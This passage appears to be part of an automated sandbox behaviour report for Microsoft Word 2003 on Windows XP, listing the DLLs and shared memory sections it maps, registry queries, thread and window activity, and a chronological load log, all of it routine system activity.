    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.PB.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.AC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.BC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.CC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.DC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.EC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.FC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.GC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.HC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IC.ELKAC query and write and read commit 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.IB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.JB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.KB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.LB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.MB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.NB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.OB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.PB.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AC.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BC.ELKAC query and write and read and execute and extend size unknown 1AC0000 4096 own pid read write success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL write and read and execute commit 1AC0000 126976 own pid execute success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and write and read and execute image 37320000 135168 own pid read write success or wait 1
    \KnownDlls\WINSPOOL.DRV write and read and execute unknown 37320000 135168 own pid read write object name not found 1
    C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
    \KnownDlls\OLEACC.dll write and read and execute unknown 73000000 155648 own pid read write object name not found 1
    C:\WINDOWS\system32\oleacc.dll query and write and read and execute image 74C80000 180224 own pid read write success or wait 1
    \KnownDlls\MSVCP60.dll write and read and execute unknown 74C80000 180224 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcp60.dll query and write and read and execute image 76080000 413696 own pid read write success or wait 1
    C:\WINDOWS\system32\oleaccrc.dll query and read commit 1AD0000 20480 own pid readonly success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and read commit 1C70000 49152 own pid readonly success or wait 1
    C:\WINDOWS\system32\stdole2.tlb query and read commit 1C80000 16384 own pid readonly success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL write and read and execute commit 1C90000 20480 own pid execute success or wait 1
    C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL query and write and read and execute image 374B0000 24576 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL write and read and execute commit 1EA0000 86016 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL query and write and read and execute image 3F000000 86016 own pid read write success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX query and read commit 1EB0000 364544 own pid readonly success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL write and read and execute commit 1F10000 536576 own pid execute success or wait 1
    C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL query and write and read and execute image 507C0000 540672 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap33678 query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap3369A query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    \BaseNamedObjects\DfSharedHeap336AD query and write and read reserve 2320000 4194304 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2B10000 745472 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B10000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B20000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2B10000 765952 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2B20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2B30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2B30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2F20000 61440 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2F30000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2F30000 200704 own pid execute success or wait 1
    C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
    C:\WINDOWS\system32\fontsub.dll write and read and execute commit 2F20000 81920 own pid execute success or wait 1
    C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 1D90000 200704 own pid execute success or wait 1
    C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 1D90000 200704 own pid readonly success or wait 1
    C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2B20000 1695744 own pid execute success or wait 1
    C:\Program Files\Messenger\msmsgs.exe query and read commit 2B20000 1695744 own pid readonly success or wait 1
    \BaseNamedObjects\MSCTF.Shared.SFM.MAB query and write and read reserve 1D90000 524288 own pid read write success or wait 1
    + Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12218368 own pid execute success or wait 1 30003006
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12263424 own pid read write success or wait 1 30003006
    \BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003006
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 9C0000 4096 own pid readonly success or wait 1 3036B023
    \BaseNamedObjects\PrimaryWord11CommandLine read unknown 9C0000 4096 own pid readonly object name not found 1 307940F8
    \BaseNamedObjects\PrimaryWord11CommandLine query and write and read commit 9C0000 4096 own pid read write success or wait 1 3079411A
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A40000 1056768 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 303703E2
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A40000 4096 own pid execute success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest query and read commit A40000 4096 own pid readonly success or wait 1 303703E2
    C:\WINDOWS\WindowsShell.Manifest read commit A40000 4096 own pid readonly success or wait 1 303703E2
    \BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown 755C0000 188416 own pid read write success or wait 1 30029EE0
    \KnownDlls\MSIMG32.dll write and read and execute unknown 1AA0000 159744 own pid execute object name not found 1 30003591
    C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003591
    C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL write and read and execute commit 2320000 3346432 own pid execute success or wait 1 30199EB3
    C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL query and write and read and execute image 3F100000 3346432 own pid read write success or wait 1 30199EB3
    Registry Activities:
    + Key value queried
    Key Path Name Completion Count Source Address
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager CommonFilesDir success or wait 1 30002FEA
    HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word MTTT success or wait 2 3
    Thread Activities:
    + Thread created
    TID PID EIP Injected Filepath Completion Count Source Address
    1800 296 7C8106F9 false C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30070E79
    236 296 7C8106F9 false C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30070E79
    + Thread resumed
    TID PID Completion Count Source Address
    1800 296 success or wait 1 30070E9B
    236 296 success or wait 1 30070E9B
    Memory Activities:
    + Memory attributes changed
    PID Filepath Base Length New Protection Old Protection Completion Count Source Address
    296 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B4D000 1000 page readonly page read and write success or wait 1 30001C39
    User Activities:
    + Window created
    Window name Class name Completion Count Source Address
    OpusApp OpusApp success 1 3002919F
    _WwC _WwC success 1 300516EB
    _WwF _WwF success 1 300516EB
    _WwB _WwB success 1 3002919F
    _WwG _WwG success 1 3002919F
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    6.0.2600.6028!ScrollBar SCROLLBAR success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    _WwC _WwC success 1 300516EB
    + Window found
    Window name Class name HWND of window Completion Count Source Address
    no string MSOBALLOON 0 success 4 0
    no string MsoHelp10 0 success 3 0
    no string AgentAnim 0 success 4 0
    + Window enumerated
    Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
    0 4004A true 0 30050, 30052, 30054, 30064, 10066, 10068, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 1 C0CF
    0 0 false 594 1019c, 10198, 10196, 10194, 10192, 1, 10072, 1007e, 10082, 1, 5a5ad5d5, 5a, 0, 0, 0 success or wait 4 45F
    + Message sent to window
    HWND Message LParam WParam Completion Count Source Address
    A00D0 45B 0 0 success 1 30794417
    10176 C141 0 0 success 16 300A3D6D
    10176 45F 0 0 success 1 30003AB6
    101B8 402 0 0 success 1 30299DBF
    2017C 402 0 0 success 12 30299DBF
    101B6 402 0 0 success 8 30299DBF
    10180 402 0 0 success 1 30299DBF
    + Window hook set
    Module Thread id Hook code Completion Count Source Address
    C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 268 FFFFFFFF success 1 3000783A
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 472355140
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 472358708
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 472360500
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 472361494
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 472362610
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 472363044
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 472363603
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 472363739
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 472376570
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 472378397
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 472381481
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 472387567
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 472389658
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 472397426
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 472400454
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472417334
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472420028
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 472420828
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 472471361
    Memory attributes changed PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B4D000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 472482133
    Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: CommonFilesDir success or wait 472482382
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12218368 Protection: execute Mapped to pid: own pid success or wait 472494565
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12263424 Protection: read write Mapped to pid: own pid success or wait 472499481
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 472535007
    Section loaded Path: \KnownDlls\psapi.dll Access: write and read and execute Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid object name not found 472558649
    Section loaded Path: C:\WINDOWS\system32\psapi.dll Access: query and write and read and execute Type: image Baseaddress: 76BF0000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 472559320
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: write and read and execute Type: commit Baseaddress: 8D0000 Size: 774144 Protection: execute Mapped to pid: own pid success or wait 472603393
    Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL Access: query and read Type: commit Baseaddress: 8D0000 Size: 774144 Protection: readonly Mapped to pid: own pid success or wait 472605059
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 9C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472615117
    Section loaded Path: \BaseNamedObjects\PrimaryWord11CommandLine Access: read Type: unknown Baseaddress: 9C0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 472617212
    Section loaded Path: \BaseNamedObjects\PrimaryWord11CommandLine Access: query and write and read Type: commit Baseaddress: 9C0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 472617337
    Message posted HWND: A00D0 Message: 45B WParam: 0 LParam: 0 success 472617634
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg19211106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A20000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 490482960
    Section loaded Path: \KnownDlls\uxtheme.dll Access: write and read and execute Type: unknown Baseaddress: A20000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 490484978
    Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 490486741
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 490536549
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 490539040
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 490544098
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A40000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 490554135
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 490556936
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 490559103
    Window created Window Name: OpusApp Class Name: OpusApp success 490595605
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: A60000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 490597115
    Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 490599884
    Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 490606904
    Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: A60000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 490616159
    Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 490619763
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490624865
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: AA0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 490627781
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490631462
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: AA0000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 490633859
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: AA0000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 490637492
    Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 490639943
    Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 490653155
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: write and read and execute Type: commit Baseaddress: AB0000 Size: 1753088 Protection: execute Mapped to pid: own pid success or wait 490655382
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL Access: query and read Type: commit Baseaddress: AB0000 Size: 1753088 Protection: readonly Mapped to pid: own pid success or wait 490657843
    Section loaded Path: \BaseNamedObjects\Local\Mso97SharedDg20321106360 Access: query and write and read and execute and extend size Type: unknown Baseaddress: C60000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 490660511
    Section loaded Path: \KnownDlls\msi.dll Access: write and read and execute Type: unknown Baseaddress: C60000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 490675067
    Section loaded Path: C:\WINDOWS\system32\msi.dll Access: query and write and read and execute Type: image Baseaddress: 7D1E0000 Size: 2867200 Protection: read write Mapped to pid: own pid success or wait 490676795
    Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word Name: MTTT success or wait 490907523
    Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Office\11.0\Word Name: MTTT success or wait 490908016
    Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 268 Hook ID: FFFFFFFF success 491161788
    Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: D00000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 491165979
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 491428207
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: D00000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 491439891
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 491478482
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: D00000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 491489359
    Window created Window Name: _WwC Class Name: _WwC success 491669376
    Window created Window Name: _WwF Class Name: _WwF success 493162833
    Windows found Window Name: no string Class Name: MSOBALLOON HWND: 0 success 493186051
    Windows found Window Name: no string Class Name: MsoHelp10 HWND: 0 success 493186346
    Windows found Window Name: no string Class Name: AgentAnim HWND: 0 success 493186645
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: write and read and execute Type: commit Baseaddress: DB0000 Size: 966656 Protection: execute Mapped to pid: own pid success or wait 493201863
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL Access: query and write and read and execute Type: image Baseaddress: 39700000 Size: 962560 Protection: read write Mapped to pid: own pid success or wait 493204814
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 493211815
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493224884
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493228585
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493232211
    Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 493235791
    Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 159744 Protection: execute Mapped to pid: own pid object name not found 493244502
    Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 493246322
    Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 493249285
    Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 493250099
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 493252549
    Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: E50000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 493323038
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: write and read and execute Type: commit Baseaddress: E50000 Size: 368640 Protection: execute Mapped to pid: own pid success or wait 493403349
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\INK\SKCHUI.DLL Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 493406768
    Section loaded Path: \BaseNamedObjects\MSCTF.GCompartListSFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: reserve Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name exists 493700570
    Section loaded Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: 10000000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 493729144
    Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 493731173
    Section loaded Path: \BaseNamedObjects\DfSharedHeap325F0 Access: query and write and read Type: reserve Baseaddress: FE0000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 494274527
    Section loaded Path: \BaseNamedObjects\DFMap0-206324 Access: query and write and read Type: commit Baseaddress: 13E0000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 494278108
    Section loaded Path: \BaseNamedObjects\DfRoot0000325F0 Access: query and write and read Type: commit Baseaddress: 1460000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 494279930
    Section loaded Path: \BaseNamedObjects\DFMap0-206340 Access: query and write and read Type: commit Baseaddress: 1470000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 494293730
